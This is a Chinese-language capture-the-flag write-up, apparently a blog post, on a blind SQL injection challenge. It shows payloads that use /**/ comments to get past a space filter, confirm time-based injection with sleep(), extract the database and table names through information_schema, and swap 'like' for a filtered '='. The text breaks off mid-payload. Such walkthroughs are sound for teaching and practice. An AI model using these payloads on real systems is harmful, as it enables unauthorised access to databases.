简单尝试下
1' or 1#
发现【空格】被过滤了

可以用 /**/ 绕过,也可以用 () 绕过,但是没有回显,尝试时间盲注
1/**/and/**/sleep(2)#
时间盲注可以
写脚本咯,构造payload查库名
payload = '1/**/and/**/ascii(substr(database()/**/from/**/%d/**/for/**/1))<%d/**/and/**/sleep(3)#'
库名可以查到,看来思路应该没错
查表名
payload = '1/**/and/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))/**/like/**/%d/**/and/**/sleep(3)#'
被提示注入,审查后发现是 = 被过滤
可以用 like 替换
payload = '1/**/and/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/info




被折叠的 条评论
为什么被折叠?



